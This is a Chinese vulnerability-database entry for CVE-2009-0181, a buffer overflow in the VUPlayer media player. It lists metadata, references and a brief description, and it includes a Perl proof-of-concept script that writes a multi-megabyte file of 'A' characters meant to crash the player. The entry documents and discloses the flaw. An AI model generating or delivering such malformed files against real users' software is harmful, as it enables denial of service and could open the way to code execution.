VUPlayer 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1184004 漏洞类型 缓冲区溢出
发布时间 2009-01-20 更新时间 2009-01-20
CVE编号 CVE-2009-0181 CNNVD-ID CNNVD-200901-233
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://www.securityfocus.com/bid/82976
https://cxsecurity.com/issue/WLB-2009010171
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-233
|漏洞详情
VUPlayer中存在缓冲区溢出漏洞。用户协助式攻击者可以借助一个过长的文件,比如全部由"A"字符组成的一个文件,造成未知影响。
|漏洞EXP
#!/usr/bin/perl

system("color 3");

if (@ARGV != 1) { &help; exit(); }

sub help(){
	print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*******************************************\n";
print " [X]    VUPLAYER BufferOver flow POC          *\n";
print " [X]        Coded By AlpHaNiX                 *\n";
print " [X]         From Null Area                   *\n";
print " [X]*******************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="\x41\x41\x41\x41" x 1000000 ;

print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $buff;
close($FILE);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";
|受影响的产品
VUPlayer VUPlayer 0
|参考资料

来源:XF
名称:vuplayer-file-bo(48169)
链接:http://xforce.iss.net/xforce/xfdb/48169
来源:BUGTRAQ
名称:20090106VUPLAYERBufferOverflowPOC
链接:http://www.securityfocus.com/archive/1/archive/1/499810/100/0/threaded
来源:SREASON
名称:4921
链接:http://securityreason.com/securityalert/4921